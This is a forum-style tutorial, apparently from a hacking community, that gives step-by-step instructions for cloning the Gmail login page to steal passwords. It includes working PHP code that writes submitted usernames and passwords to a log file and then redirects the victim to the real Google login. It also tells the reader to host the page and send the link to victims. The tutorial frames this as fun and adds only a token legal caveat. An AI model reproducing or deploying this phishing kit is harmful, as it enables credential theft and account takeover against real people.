Phishing Tutorial : The Way to Fish Passwords!

Phishing basically is the attempt to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.

For such attacks, popular social web sites, auction sites, banks sites, online payment/transfer sites or IT administrators are commonly used to lure unsuspecting public. Phishing emails or instant messages may contain links to websites that are infected with malware, so then the victim enters his details at a fake website whose look and feel are almost identical to the legitimate one.

Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies.

Phishing can be done for fun to attack Facebook, Gmail, Yahoo, Twitter, etc. Such attacks on Social Networking Sites are used to steal password and Hack Accounts. But beware, don't exceed your limits as this is illegal.

For Example, we took Gmail for the Tutorial.

Basic Pre requisites :

* Basic knowledge about HTML (Hyper Text Markup Language)

* Basic of How Web Applications Work

* Basic knowledge in PHP (Not Recommended)

* Little about Hosting Files on WWW (World Wide Web)

Steps : 

- Open mail.google.com login page, Hit Ctrl + S [ Then Save it on Desktop]

You'll get one folder with images + javascript and one.html file

click to enlarge

- Do not touch anything in folder, now open the '.html file' with Notepad or any text editor, and lets mess with some codes.

- If you know little bit of HTML & CSS then this will be a real easy task for you.

   'All websites use HTML form to get ID and Password, we just have to modify the code with some changes and connect little PHP file to the HTML form so our application can record Username and password and save it into one log file'

- Now, Search for "action" statement  in the code. (you've to change action value with your PHP file)

Click to enlarge

- Now Just pause this tutorial here and back to desktop, now Open notepad and just write 5 lines PHP code like this :

<?phpheader ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');$handle = fopen("log.txt", "a");foreach($_POST as $variable =>$value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>

Now, Just save that entire code to desktop with downloaded files, as .PHP extension file, for eg.: Error.php (so your victim won't realize and he might think that it is some kind of error and didn't logged in, & he'll then be redirected the real page) Also create one Blank notepad .txt file and place it at same downloaded file with the name of 'log.txt'.

click to enlarge

So, its very easy and simple... now again back to the edited code of .html file and change action value to "Error.php" name of your PHP logger. Save it, and Finally you're done. you created Gmail Phishing page, now we'll host this on a Free WebHosting services like 000webhost.com and after all this work you've to give the created web link to the victim and wait until he enters his email and password.

Enjoy...!!

This post was created by one of our elite members NightMare!

Also visit back to view our next post about how to be safe from such Phishing Attacks.